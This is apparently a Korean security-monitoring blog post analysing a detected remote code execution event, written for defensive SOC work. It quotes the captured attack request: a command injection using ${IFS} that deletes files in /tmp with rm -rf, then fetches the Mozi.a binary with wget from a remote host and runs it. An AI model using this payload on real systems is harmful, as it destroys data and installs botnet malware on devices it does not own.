반응형
공격설명
원격 코드나 명령 실행(RCE)이 탐지되었습니다.
원격 코드 실행(RCE) 공격은 공격자가 조직의 컴퓨터나 네트워크에서 악성 코드를 실행할 수 있는 공격입니다.
공격자가 제어하는 코드를 실행하는 기능은 추가 맬웨어를 배포하거나 중요한 데이터를 탈취하는 등 다양한 목적으로
사용될 수 있습니다
공격구문
GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
탐지근거
wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a
반응형
'보안관제 이벤트 분석' 카테고리의 다른 글
| [보안관제] Application Vulnerability (0) | 2024.08.30 |
|---|---|
| [보안관제] 자동화 스캐닝 도구 탐지 (0) | 2024.08.30 |
| [보안관제] SQL Injection (0) | 2024.08.28 |
| [보안관제]디렉토리 우회공격 시도 탐지 (0) | 2024.08.28 |
| [보안관제]Directory Traversal (0) | 2024.08.16 |